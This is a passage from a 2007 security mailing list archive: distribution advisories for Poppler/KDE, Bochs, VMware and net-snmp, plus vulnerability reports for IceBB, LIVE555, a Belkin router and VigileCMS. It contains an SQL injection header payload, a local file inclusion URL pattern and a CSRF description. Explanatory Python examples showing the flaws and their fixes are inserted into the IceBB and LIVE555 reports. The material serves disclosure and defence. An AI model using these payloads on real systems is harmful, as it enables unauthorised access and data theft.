  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch1_all.deb
    Size/MD5 checksum:   892958 b72f4306cdcc411968bc54491ac6696b
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch1_all.deb
    Size/MD5 checksum:    45176 6ca4f99c22bf3e6eec0079e8a01a68ef

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:  1096368 6523296d1d1613a7cfd36bd265c974f7
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:   184368 c7e3133c196127974d6b71c67358c246
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:    39260 b8d5365d556d5b64963e3b6178d68b22
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:    86290 45dfb12be30b25e61cf8bf460e97911e
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:   174548 b1ee2a0d2bb0735d0b2bbf7c0e40476e
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:    94398 15b3f227f555b1941989759912973848
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:  1608552 b80b721d60e124eb4c05f435030871ea
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch1_alpha.deb
    Size/MD5 checksum:    72420 6737d2589f6a677163c4c87e635dd0fd

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:  1085590 2be48ac8d50f01f7ecf2a5b114ec6d05
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:   161610 4239e0f75c12f2210a3df46906dcd04c
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:    85250 0ea980db61895312baaf357a226bf184
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:    80708 cefeab800fbd1e48171372203d23f603
  http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:    52852 af100770f7496a6e3ab8d03283c3c170
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:  1574368 fbcc426835208cdf90a16c2d8d876ea5
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch1_amd64.deb
    Size/MD5 checksum:    36356 4ced6fa9d3fa0f490d42b706d6fbc2d7
http://security.debian.org/pool/updates/main/c/

[ GLSA 200711-22 ] Poppler, KDE: User-assisted execution of arbitrary code

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Poppler, KDE: User-assisted execution of arbitrary code
      Date: November 18, 2007
      Bugs: #196735, #198409
        ID: 200711-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Poppler and various KDE components are vulnerable to multiple memory
management issues possibly resulting in the execution of arbitrary
code.

Background
==========

Poppler is a cross-platform PDF rendering library originally based on
Xpdf. KOffice is an integrated office suite for KDE. KWord is the
KOffice word processor. KPDF is a KDE-based PDF viewer included in the
kdegraphics package.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                 Unaffected
    -------------------------------------------------------------------
  1  app-text/poppler         < 0.6.1-r1                   >= 0.6.1-r1
  2  kde-base/kpdf            < 3.5.8-r1                  *>= 3.5.7-r3
                                                           >= 3.5.8-r1
  3  kde-base/kdegraphics     < 3.5.8-r1                  *>= 3.5.7-r3
                                                           >= 3.5.8-r1
  4  app-office/kword         < 1.6.3-r2                   >= 1.6.3-r2
  5  app-office/koffice       < 1.6.3-r2                   >= 1.6.3-r2
    -------------------------------------------------------------------
     5 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Alin Rad Pop (Secunia Research) discovered several vulnerabilities in
the "Stream.cc" file of Xpdf: An integer overflow in the
DCTStream::reset() method and a boundary error in the
CCITTFaxStream::lookChar() method, both leading to heap-based buffer
overflows (CVE-2007-5392, CVE-2007-5393). He also discovered a boundary
checking error in the DCTStream::readProgressiveDataUnit() method
causing memory corruption (CVE-2007-4352). Note: Gentoo's version of
Xpdf is patched to use the Poppler library, so the update to Poppler
will also fix Xpdf.

Impact
======

By enticing a user to view or process a specially crafted PDF file with
KWord or KPDF or a Poppler-based program such as Gentoo's viewers Xpdf,
ePDFView, and Evince or the CUPS printing system, a remote attacker
could cause an overflow, potentially resulting in the execution of
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Poppler users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/poppler-0.6.1-r1"

All KPDF users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=kde-base/kpdf-3.5.7-r3"

All KDE Graphics Libraries users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=kde-base/kdegraphics-3.5.7-r3"

All KWord users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/kword-1.6.3-r2"

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/koffice-1.6.3-r2"

References
==========

  [ 1 ] CVE-2007-4352
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
  [ 2 ] CVE-2007-5392
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
  [ 3 ] CVE-2007-5393
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQKbHuhJ+ozIKI5gRAl/iAJ0XNSINVi0zD5q+JKbQ1EGR

IceBB 1.0rc6 <= Remote SQL Injection

2007-11-19 Thread aeroxteam-nospam
[|Description:|]

A security flaw has been discovered in IceBB 1.0-rc6.

It is caused by insufficient filtering of the X-Forwarded-For request header, a value the client controls:


> ./includes/functions.php, line 73

$ip = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR']
                                                : $_SERVER['HTTP_X_FORWARDED_FOR'];

$ip = $this->clean_key($ip);

$input['ICEBB_USER_IP'] = $ip;


> ./icebb.php, line 169

$icebb->client_ip = $input['ICEBB_USER_IP'];


> ./admin/index.php, line 112

$icebb->adsess = $db->fetch_result("SELECT adsess.*, u.id as userid, u.username, u.temp_ban, g.g_view_board
    FROM icebb_adsess AS adsess
    LEFT JOIN icebb_users AS u ON u.username = adsess.user
    LEFT JOIN icebb_groups AS g ON u.user_group = g.gid
    WHERE adsess.asid = '{$icebb->input['s']}' AND adsess.ip = '{$icebb->client_ip}'
    LIMIT 1");


An attacker can therefore use the X-Forwarded-For header to alter the SQL query that validates admin sessions; note that the session id taken from the "s" parameter is interpolated into the same query in the same way.
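
The path described above, worked through as an added example (this is not IceBB's code): the header value becomes the "IP" compared in the admin-session query, a payload with a quote turns the WHERE clause into a tautology, and a fixed version validates the value and binds it instead of splicing it into the SQL text. SQLite stands in for MySQL so it runs offline. The reduced table icebb_adsess(asid, user, ip), the sample session row, the header dictionaries and the trusted-proxy set are all constructed here and are not from the advisory; IceBB's clean_key() is modelled as a plain strip(), which is enough to show that quotes pass through.

```python
"""Added example, not IceBB's code: how an attacker-controlled
X-Forwarded-For value reaches the admin-session query, and a fixed
version. SQLite stands in for MySQL so it runs offline.

Assumptions (constructed here, not taken from the advisory): the reduced
table icebb_adsess(asid, user, ip), the sample session row, and the
header dictionaries used as input. IceBB's clean_key() is modelled as a
plain strip(), which is enough to show that quotes pass through.
"""
import ipaddress
import sqlite3


def client_ip_as_icebb(headers: dict, remote_addr: str) -> str:
    # Same rule as includes/functions.php: X-Forwarded-For wins when set.
    # Any client can send that header, so its value is attacker input.
    xff = headers.get("X-Forwarded-For", "")
    return (xff or remote_addr).strip()


def client_ip_trusted(headers: dict, remote_addr: str, trusted_proxies: frozenset) -> str:
    # Only honour X-Forwarded-For when the TCP peer is a proxy we operate,
    # and then take the rightmost entry, the one that proxy appended itself.
    xff = headers.get("X-Forwarded-For", "")
    if remote_addr in trusted_proxies and xff:
        return xff.split(",")[-1].strip()
    return remote_addr


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE icebb_adsess (asid TEXT, user TEXT, ip TEXT)")
    # One live admin session, bound to the admin's real address (sample row).
    db.execute("INSERT INTO icebb_adsess VALUES ('sess-1234', 'admin', '10.0.0.5')")
    return db


def lookup_adsess_vulnerable(db, asid: str, client_ip: str):
    # String interpolation, as in the admin/index.php query quoted above.
    sql = ("SELECT adsess.asid, adsess.user FROM icebb_adsess AS adsess "
           f"WHERE adsess.asid='{asid}' AND adsess.ip='{client_ip}' LIMIT 1")
    return db.execute(sql).fetchone()


def lookup_adsess_fixed(db, asid: str, client_ip: str):
    # Validate the shape of the value, then bind it instead of splicing it
    # into the SQL text. Binding alone already stops this payload; the
    # IP check additionally rejects junk before it reaches the database.
    try:
        ipaddress.ip_address(client_ip)
    except ValueError:
        return None
    sql = ("SELECT adsess.asid, adsess.user FROM icebb_adsess AS adsess "
           "WHERE adsess.asid=? AND adsess.ip=? LIMIT 1")
    return db.execute(sql, (asid, client_ip)).fetchone()


def demo():
    db = build_db()
    # The attacker knows no valid session id. The header payload turns the
    # WHERE clause into (asid='x' AND ip='') OR '1'='1', which matches the
    # admin's session row, so the first query returns it.
    evil = client_ip_as_icebb({"X-Forwarded-For": "' OR '1'='1"}, "203.0.113.9")
    hijacked = lookup_adsess_vulnerable(db, "x", evil)
    blocked = lookup_adsess_fixed(db, "x", evil)
    return hijacked, blocked


if __name__ == "__main__":
    print(demo())
```

Binding the parameters is the fix that generalises: the "s" session id in the quoted query is interpolated exactly the same way, and an IP validator does nothing for it. Whether a request's X-Forwarded-For should be believed at all is a separate decision that depends on a trusted proxy in front of the application, which is what client_ip_trusted() models.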


[|Exploit:|]

http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php


[|Solution:|]

None yet. Update your forum core when a patch becomes available on the
official website.


[|Credits:|]

Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)

for AeroX (AeroXteam.fr)


[|Greetz:|]

Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody 
from #aerox



Crash in LIVE555 Media Server 2007.11.01

2007-11-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  LIVE555 Media Server
  http://www.live555.com/mediaServer/
Versions: <= 2007.11.01
Platforms:*nix, Windows, Mac and others
Bug:  crash caused by access to unallocated memory
Exploitation: remote, versus server
Date: 18 Nov 2007
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


LIVE555 Media Server is an open source RTSP server application released
under LGPL.


###

==
2) Bug
==


The function that parses incoming client requests contains a flaw that
lets an attacker crash the server remotely with the smallest possible
RTSP request.

The function never checks that the client's data (reqStrSize) is at
least 8 bytes long. Because reqStrSize is unsigned, the expression
reqStrSize-8 wraps around for shorter requests: "7 - 8" is not -1 but
4294967295, so the loop below reads past the end of the allocated
buffer and the server crashes.

From liveMedia/RTSPCommon:

Boolean parseRTSPRequestString(char const* reqStr,
                               unsigned reqStrSize,
                               ...
  unsigned i;
  for (i = 0; i < resultCmdNameMaxSize-1 && i < reqStrSize; ++i) {

...

  // Skip over the prefix of any "rtsp://" or "rtsp:/" URL that follows:
  unsigned j = i+1;
  while (j < reqStrSize && (reqStr[j] == ' ' || reqStr[j] == '\t')) ++j;
  for (j = i+1; j < reqStrSize-8; ++j) {
...
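
The arithmetic behind the crash, modelled as an added example (this is not LIVE555 code): Python integers do not wrap, so the C `unsigned` subtraction reqStrSize - 8 is reproduced with a 32-bit mask, the two loops from the excerpt are mirrored, and a second function adds the minimum-length check that section 2 describes as missing (the check is written from that description, not copied from the 2007.11.18 release). The request layout "COMMAND <whitespace> rtsp://..." follows the excerpt; the sample requests are constructed.

```python
"""Added example, not LIVE555 code: a Python model of the unsigned
underflow in parseRTSPRequestString() and of the minimum-length check
that section 2 describes as missing. Python integers do not wrap, so
the C `unsigned` subtraction reqStrSize - 8 is reproduced with a 32-bit
mask.

Assumptions (constructed here): the request layout is "COMMAND <ws>
rtsp://..." as in the excerpt, and the sample requests are made up.
"""
U32_MASK = 0xFFFFFFFF


def unsigned_sub(a: int, b: int) -> int:
    """32-bit unsigned subtraction, the way C evaluates reqStrSize - 8."""
    return (a - b) & U32_MASK


def parse_command_flawed(req: bytes):
    """Mirror the vulnerable loop bounds: no minimum-length check.

    Returns the command name, or "oob-read" when the second loop indexes
    past the buffer. In the C++ server that read runs off the heap
    allocation and crashes the process; here Python raises IndexError.
    """
    n = len(req)
    i = 0
    cmd = bytearray()
    # for (i = 0; i < resultCmdNameMaxSize-1 && i < reqStrSize; ++i)
    while i < n and req[i] not in b" \t\r\n":
        cmd.append(req[i])
        i += 1
    # for (j = i+1; j < reqStrSize-8; ++j)  -- reqStrSize-8 wraps when n < 8
    limit = unsigned_sub(n, 8)
    j = i + 1
    try:
        while j < limit:
            if req[j] == 0x72 and req[j:j + 7] == b"rtsp://":  # 0x72 == 'r'
                break
            j += 1
    except IndexError:
        return "oob-read"
    return cmd.decode("ascii", errors="replace")


def parse_command_fixed(req: bytes):
    """Same parser, preceded by the check the advisory says is absent:
    a request shorter than 8 bytes is rejected before reqStrSize - 8 can
    wrap. With n >= 8 the loop bound n - 8 is always below n."""
    if len(req) < 8:
        return None
    return parse_command_flawed(req)


if __name__ == "__main__":
    print(unsigned_sub(7, 8))                    # 4294967295
    print(parse_command_flawed(b"OPTIONS"))       # oob-read
    print(parse_command_fixed(b"OPTIONS"))        # None
    print(parse_command_fixed(b"OPTIONS rtsp://198.51.100.1/s RTSP/1.0\r\n"))
```

The general lesson is that any `x - k` on an unsigned length used as a loop bound needs `x >= k` established first (or rewritten as `j + k < x`); the 7-byte request is simply the shortest input that makes the wrap visible.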


###

===
3) The Code
===


http://aluigi.org/poc/live555x.zip


###

==
4) Fix
==


Version 2007.11.18


###


--- 
Luigi Auriemma
http://aluigi.org


[ MDKSA-2007:225 ] - Updated net-snmp packages fix remote denial of service vulnerability

2007-11-19 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:225
 http://www.mandriva.com/security/
 ___
 
 Package : net-snmp
 Date: November 19, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The SNMP agent in net-snmp 5.4.1 and earlier allows remote attackers to
 cause a denial of service (CPU and memory consumption) via a GETBULK
 request with a large max-repeaters value.
 
 Updated packages fix this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 83e0d0edc66af5d11b032cf2a7c12054  
2007.0/i586/libnet-snmp10-5.3.1-2.1mdv2007.0.i586.rpm
 211db38ffbbefb22f653a18da8e928f5  
2007.0/i586/libnet-snmp10-devel-5.3.1-2.1mdv2007.0.i586.rpm
 b43cc33ca2b0fb582e69bbe52578e76a  
2007.0/i586/libnet-snmp10-static-devel-5.3.1-2.1mdv2007.0.i586.rpm
 e2ac837cd1eff29bb56f5fa964f59ed5  
2007.0/i586/net-snmp-5.3.1-2.1mdv2007.0.i586.rpm
 2434602e5d0a3133318600b4071cf4ea  
2007.0/i586/net-snmp-mibs-5.3.1-2.1mdv2007.0.i586.rpm
 d9336d2710c1a44531cdb790cd8f47cf  
2007.0/i586/net-snmp-trapd-5.3.1-2.1mdv2007.0.i586.rpm
 a1945889589568b420181a8a196d51ad  
2007.0/i586/net-snmp-utils-5.3.1-2.1mdv2007.0.i586.rpm
 cf8fd2357e80a805ab3210fd3a8f8d01  
2007.0/i586/perl-NetSNMP-5.3.1-2.1mdv2007.0.i586.rpm 
 da66327183a153d054bbc5d70fde958c  
2007.0/SRPMS/net-snmp-5.3.1-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 7a4a25157d9a1e3b9cf4bf7af1205aa8  
2007.0/x86_64/lib64net-snmp10-5.3.1-2.1mdv2007.0.x86_64.rpm
 cab6a3e8bc7167656e38e5a429eb8c0a  
2007.0/x86_64/lib64net-snmp10-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
 03f09f4fe99c381bda2603861f9644a2  
2007.0/x86_64/lib64net-snmp10-static-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
 425489fcb707757a46e0c6105309e2ff  
2007.0/x86_64/net-snmp-5.3.1-2.1mdv2007.0.x86_64.rpm
 7df1fa9a564c63687621355561ba9eec  
2007.0/x86_64/net-snmp-mibs-5.3.1-2.1mdv2007.0.x86_64.rpm
 fe2aaae5507ae5122a7d30f9fd74eef5  
2007.0/x86_64/net-snmp-trapd-5.3.1-2.1mdv2007.0.x86_64.rpm
 ee1ae1d56af4b511b3bb2b1a986aa60a  
2007.0/x86_64/net-snmp-utils-5.3.1-2.1mdv2007.0.x86_64.rpm
 04393ea88742f3b05586a555d8ad81ec  
2007.0/x86_64/perl-NetSNMP-5.3.1-2.1mdv2007.0.x86_64.rpm 
 da66327183a153d054bbc5d70fde958c  
2007.0/SRPMS/net-snmp-5.3.1-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 fa0f200cd711f97684d9debfdeef3e15  
2007.1/i586/libnet-snmp10-5.3.1-3.1mdv2007.1.i586.rpm
 68c25bedfd4370a5fc0aa5ff934a2b1b  
2007.1/i586/libnet-snmp10-devel-5.3.1-3.1mdv2007.1.i586.rpm
 ecbd2c76a1ea3595594f10c66bea5772  
2007.1/i586/libnet-snmp10-static-devel-5.3.1-3.1mdv2007.1.i586.rpm
 04c676ae1290bbfbd7083252ae5b10dd  
2007.1/i586/net-snmp-5.3.1-3.1mdv2007.1.i586.rpm
 2a6c6befd5958c7c9c946d2189d2f128  
2007.1/i586/net-snmp-mibs-5.3.1-3.1mdv2007.1.i586.rpm
 5cd1e27c1af30157ead213324c440527  
2007.1/i586/net-snmp-trapd-5.3.1-3.1mdv2007.1.i586.rpm
 423682a7f455940da49272647925838e  
2007.1/i586/net-snmp-utils-5.3.1-3.1mdv2007.1.i586.rpm
 1ca18897188b7a34d98b146d65746477  
2007.1/i586/perl-NetSNMP-5.3.1-3.1mdv2007.1.i586.rpm 
 f2a3a8df265da917384a4c0916b330a6  
2007.1/SRPMS/net-snmp-5.3.1-3.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 9cdea571a84945accd6d38527b1bedb5  
2007.1/x86_64/lib64net-snmp10-5.3.1-3.1mdv2007.1.x86_64.rpm
 8352cb8ef1fac035ea009d696e1d5837  
2007.1/x86_64/lib64net-snmp10-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
 5e54dd10e2f97bd2ee23f0a715ef734e  
2007.1/x86_64/lib64net-snmp10-static-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
 3187463725a5b015d3f507ac4a723160  
2007.1/x86_64/net-snmp-5.3.1-3.1mdv2007.1.x86_64.rpm
 638d8c0a5d4be46ee1b9c2640ed7a061  
2007.1/x86_64/net-snmp-mibs-5.3.1-3.1mdv2007.1.x86_64.rpm
 c4f41ebf9bf64dfc5236bb935ee16c31  
2007.1/x86_64/net-snmp-trapd-5.3.1-3.1mdv2007.1.x86_64.rpm
 734133a9a7a860f90b76c8bd72a0ddd0  
2007.1/x86_64/net-snmp-utils-5.3.1-3.1mdv2007.1.x86_64.rpm
 b1f5da81f1c27888df5ba8f71279fb05  
2007.1/x86_64/perl-NetSNMP-5.3.1-3.1mdv2007.1.x86_64.rpm 
 f2a3a8df265da917384a4c0916b330a6  
2007.1/SRPMS/net-snmp-5.3.1-3.1mdv2007.1.src.rpm

 Corporate 3.0:
 748009feee8a9d4d904b7e77537ff791  
corporate/3.0/i586/libnet-snmp5-5.1-7.3.C30mdk.i586.rpm
 8ca0b75c8ec8e0839ae37335b04629ab  
corporate/3.0/i586/libnet-snmp5-devel-5.1-7.3.C30mdk.i586.rpm
 a0c2d416faa87c016826b5f8616c3af3  
corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.3.C30mdk.i586.rpm
 99659604d3f40d23179b2b3138178e41  
corporate/3.0/i586/net-snmp-5.1-7.3.C30mdk.i586.rpm
 3f9e8c99d31dd0dd0d3e5364325370ac  
corporate/3.0/i586/net-snmp-mibs-5.1-7.3.C30mdk.i586.rpm
 6bf842fa5664b91

Belkin Wireless G Router DoS

2007-11-19 Thread r00t
#ATI Security Group has discovered a denial of service vulnerability in
Belkin Wireless G routers.


#Vulnerability: Denial of Service (SYN FLOOD)


#Simple Dork: http://RouterIp (DoS SYN FLOOD on ROUTER)


#Vulnerable Product; Belkin Wireless G Router

Router Model #F5D7230-4


#Tested on; Belkin Wireless G F5D7230-4


#Additional Information: This router is vulnerable to SYN flood attacks.
The flood also causes a secondary denial of service in the logging system
(log.stm): the volume of log entries overloads the logger, which then
stops recording other activity.


VigileCMS 1.4 Multiple Remote Vulnerabilities

2007-11-19 Thread info
VigileCMS 1.4 Multiple Remote Vulnerabilities

---

---

   Author : DevilAuron (http://devilsnight.altervista.org)


   Vendor : VigileCMS 1.4

   Date   : [16-11-2007] (dd-mm-)



Persistent XSS:

---

http://[site]/[path]/index.php?module=vedipm&inviapm=true

http://[site]/[path]/index.php?module=live_chat

Insert the XSS payload in the message field.



Local File Inclusion:

---

http://[site]/[path]/index.php?module=[somefile]%00



CSRF:

---

http://127.0.0.1/VIGILE_1.4/index.php?module=changepass

[PoC: an HTML form named "cambia" that posts to the URL above and is
submitted automatically with document.cambia.submit(); the form markup
and its input fields are not preserved here.]




---



[ GLSA 200711-21 ] Bochs: Multiple vulnerabilities

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Bochs: Multiple vulnerabilities
  Date: November 17, 2007
  Bugs: #188148
ID: 200711-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in Bochs, possibly
allowing for the execution of arbitrary code or a Denial of Service.

Background
==

Bochs is an IA-32 (x86) PC emulator written in C++.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  app-emulation/bochs< 2.3   >= 2.3

Description
===

Tavis Ormandy of the Google Security Team discovered a heap-based
overflow vulnerability in the NE2000 driver (CVE-2007-2893). He also
discovered a divide-by-zero error in the emulated floppy disk
controller (CVE-2007-2894).

Impact
==

A local attacker in the guest operating system could exploit these
issues to execute code outside of the virtual machine, or cause Bochs
to crash.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Bochs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-emulation/bochs-2.3"

References
==

  [ 1 ] CVE-2007-2893
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2893
  [ 2 ] CVE-2007-2894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2894

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-21.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHP4AduhJ+ozIKI5gRAoGsAJ9eTHVtsnVWsAII4m9eSnmobPGyLQCfcQqf
ktlcEcQo/3p6PbW4BrKZlxI=
=lCTl
-END PGP SIGNATURE-


[ GLSA 200711-23 ] VMware Workstation and Player: Multiple vulnerabilities

2007-11-19 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: VMware Workstation and Player: Multiple vulnerabilities
  Date: November 18, 2007
  Bugs: #193196
ID: 200711-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


VMware guest operating systems might be able to execute arbitrary code
with elevated privileges on the host operating system through multiple
flaws.

Background
==

VMware Workstation is a virtual machine for developers and system
administrators. VMware Player is a freeware virtualization software
that can run guests produced by other VMware products.

Affected packages
=

---
 Package /Vulnerable/   Unaffected
---
  1  vmware-workstation  < 6.0.1.55017 *>= 5.5.5.56455
>= 6.0.1.55017
  2  vmware-player   < 2.0.1.55017 *>= 1.0.5.56455
>= 2.0.1.55017
---
 2 affected packages on all of their supported architectures.
---

Description
===

Multiple vulnerabilities have been discovered in several VMware
products. Neel Mehta and Ryan Smith (IBM ISS X-Force) discovered that
the DHCP server contains an integer overflow vulnerability
(CVE-2007-0062), an integer underflow vulnerability (CVE-2007-0063) and
another error when handling malformed packets (CVE-2007-0061), leading
to stack-based buffer overflows or stack corruption. Rafal Wojtczuk
(McAfee) discovered two unspecified errors that allow authenticated
users with administrative or login privileges on a guest operating
system to corrupt memory or cause a Denial of Service (CVE-2007-4496,
CVE-2007-4497). Another unspecified vulnerability related to untrusted
virtual machine images was discovered (CVE-2007-5617).

VMware products also shipped code copies of software with several
vulnerabilities: Samba (GLSA-200705-15), BIND (GLSA-200702-06), MIT
Kerberos 5 (GLSA-200707-11), Vixie Cron (GLSA-200704-11), shadow
(GLSA-200606-02), OpenLDAP (CVE-2006-4600), PAM (CVE-2004-0813,
CVE-2007-1716), GCC (CVE-2006-3619) and GDB (CVE-2006-4146).

Impact
==

Remote attackers within a guest system could possibly exploit these
vulnerabilities to execute code on the host system with elevated
privileges or to cause a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All VMware Workstation users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/vmware-workstation-5.5.5.56455"

All VMware Player users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/vmware-player-1.0.5.56455"

References
==

  [ 1 ] CVE-2004-0813
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0813
  [ 2 ] CVE-2006-3619
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3619
  [ 3 ] CVE-2006-4146
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4146
  [ 4 ] CVE-2006-4600
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4600
  [ 5 ] CVE-2007-0061
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0061
  [ 6 ] CVE-2007-0062
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062
  [ 7 ] CVE-2007-0063
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0063
  [ 8 ] CVE-2007-1716
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716
  [ 9 ] CVE-2007-4496
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4496
  [ 10 ] CVE-2007-4497
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4497
